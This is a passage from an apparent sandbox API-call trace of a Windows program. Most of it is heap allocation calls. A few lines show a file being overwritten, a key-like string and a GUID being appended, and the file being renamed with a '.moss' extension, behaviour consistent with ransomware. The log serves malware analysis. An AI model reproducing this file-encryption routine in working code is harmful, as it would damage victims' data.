lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.099] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0173.099] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0173.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0173.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0173.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e898 [0173.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0173.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0173.100] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e8b0 [0173.100] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e880 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4ddd0 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd320 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dd70 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4dde8 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e8c8 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4dd70 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dde8 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e898 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e898 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b48a18 [0173.101] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0173.101] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd70 | out: hHeap=0xcd0000) returned 1 [0173.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b48c28 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x3aa2470 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0173.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa28d0 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e898 | out: hHeap=0xcd0000) returned 1 [0173.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b48e40 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0173.102] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f1c8 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa28d0 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c28 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48e40 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e8c8 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0173.102] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddd0 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e8b0 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e880 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e868 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57c78 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48a18 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0173.103] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0173.103] WriteFile (in: hFile=0x664, lpBuffer=0x3b62d40*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b62d40*, lpNumberOfBytesWritten=0x401fb14*=0x25800, lpOverlapped=0x0) returned 1 [0173.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b62d40 | out: hHeap=0xcd0000) returned 1 [0173.104] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xdd600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.104] WriteFile (in: hFile=0x664, lpBuffer=0x35deb08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x35deb08*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0173.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0173.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0173.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0173.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0173.104] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0173.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.104] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0173.104] WriteFile (in: hFile=0x664, lpBuffer=0x3b48c50*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48c50*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0173.105] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48c50 | out: hHeap=0xcd0000) returned 1 [0173.105] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0173.105] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0173.105] CloseHandle (hObject=0x664) returned 1 [0173.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xb0) returned 0x360f4d0 [0173.125] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8c0) returned 0x3b44498 [0173.125] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x360f4d0 | out: hHeap=0xcd0000) returned 1 [0173.125] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.moss")) returned 1 [0173.132] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0173.132] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0173.132] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.134] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdba388 | out: hHeap=0xcd0000) returned 1 [0173.134] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0173.134] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.134] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0173.134] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4cf88 | out: hHeap=0xcd0000) returned 1 [0173.134] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.134] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x360a138 [0173.134] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.134] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.134] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.134] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.134] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.134] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.134] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.134] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.135] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.135] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.136] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.136] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc0) returned 0x3609ee0 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0173.137] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609ee0 | out: hHeap=0xcd0000) returned 1 [0173.137] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, 